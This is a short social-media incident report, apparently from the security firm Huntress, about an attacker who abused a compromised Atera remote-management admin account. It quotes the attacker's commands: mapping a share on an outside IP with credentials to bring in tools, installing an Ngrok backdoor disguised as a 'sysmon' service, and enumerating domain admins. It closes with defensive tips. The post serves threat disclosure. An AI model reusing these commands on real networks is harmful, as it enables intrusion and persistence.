Huntress’ Post

A threat actor compromised a privileged admin account to gain control of a legit Atera remote management infrastructure. From there, they pivoted across multiple organizations: 📂 They brought their tools across by network-joining a malicious share folder: net use \\147.45.79[.]160\folder /user:drakon StronGpass@@s 🚪 They set up an Ngrok backdoor as a Windows Service named 'sysmon': C:\programdata\ssh\nssm.exe 🪟They found the domain admins of the AD: C:\Windows\system32\net.exe group /domain "domain admins" Alongside an awesome partner, our SOC shut down the threat and kicked them out of the network. To keep your remote management infrastructure adversary-free, here’s some tips: ✅ Tightly control account proliferation and privilege ✅ Allow-listing IPs of access, where possible ✅ Have redundancy and 'kill switches' for the worst-case scenario where your trusted RMM is compromised

  • No alternative text description for this image
Hacene Djelid

Senior Solutions Architect at boxIT, LLC

1mo

Scary 😱

Like
Reply
Don Mangiarelli Cyber Security Hawaii

Cybersecurity Town Crier | IT Services | Helpdesk | AI for Business | Compliance Done For You | Ransomware Cleanup

1mo

Tal Tsur did you see this?

Like
Reply
See more comments

To view or add a comment, sign in

Explore topics